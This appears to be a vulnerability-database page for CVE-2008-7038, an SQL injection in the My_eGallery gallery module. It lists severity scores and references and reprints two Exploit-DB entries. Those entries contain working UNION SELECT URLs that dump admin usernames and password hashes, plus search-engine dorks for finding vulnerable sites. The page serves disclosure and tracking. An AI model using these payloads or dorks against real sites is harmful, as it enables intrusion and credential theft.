CVE-2008-7038
published 2009-08-24CVE-2008-7038: SQL injection vulnerability in the My_eGallery module for PHP-Nuke allows remote attackers to execute arbitrary SQL commands via the gid parameter in a…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.16%
63.3th percentile
SQL injection vulnerability in the My_eGallery module for PHP-Nuke allows remote attackers to execute arbitrary SQL commands via the gid parameter in a showgall action to modules.php. NOTE: this issue was disclosed by an unreliable researcher, so the details might be incorrect.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
XOOPS Module My_eGallery 3.04 - 'gid' SQL Injection
exploitdb·2008-03-12
CVE-2008-7038 XOOPS Module My_eGallery 3.04 - 'gid' SQL Injection
XOOPS Module My_eGallery 3.04 - 'gid' SQL Injection
---
##########################################
#
# XOOPS Module My_eGallery 3.04
#
#download=http://webscripts.softpedia.com/script/Modules/Other-Modules/My-eGallery-dev-8113.html
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAİL : [email protected]
#
###########################################
#
# DORKS 1 : allinurl :"modules/my_egallery"
#
###########################################
EXPLOIT :
modules/my_egallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3,4,5,6/**/from+xoops_users/*
###########################################
##################S@BUN####################
##################################
Exploit-DB
PHP-Nuke Module My_eGallery 2.7.9 - SQL Injection
exploitdb·2008-02-28
CVE-2008-7038 PHP-Nuke Module My_eGallery 2.7.9 - SQL Injection
PHP-Nuke Module My_eGallery 2.7.9 - SQL Injection
---
Aria-Security Team
http://Aria-Security.Net
Shoutz: Aura, Null, imm02tal, Kinglet, and our staff
PHP-Nuke My_eGallery "gid" Remote SQL Injection
Dork: inurl:"modules.php?name=My_eGallery"
modules.php?op=modload&name=My_eGallery&file=index&do=showgall&gid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
The-0utl4w
>From Aria-Security.Net
Original Link: http://forum.aria-security.net/showthread.php?p=1490
# milw0rm.com [2008-02-28]
No writeups or analysis indexed.
http://osvdb.org/51021http://www.securityfocus.com/archive/1/488916/100/100/threadedhttp://www.securityfocus.com/bid/28030https://exchange.xforce.ibmcloud.com/vulnerabilities/40910https://www.exploit-db.com/exploits/5203https://www.exploit-db.com/exploits/5242http://osvdb.org/51021http://www.securityfocus.com/archive/1/488916/100/100/threadedhttp://www.securityfocus.com/bid/28030https://exchange.xforce.ibmcloud.com/vulnerabilities/40910https://www.exploit-db.com/exploits/5203https://www.exploit-db.com/exploits/5242
2009-08-24
Published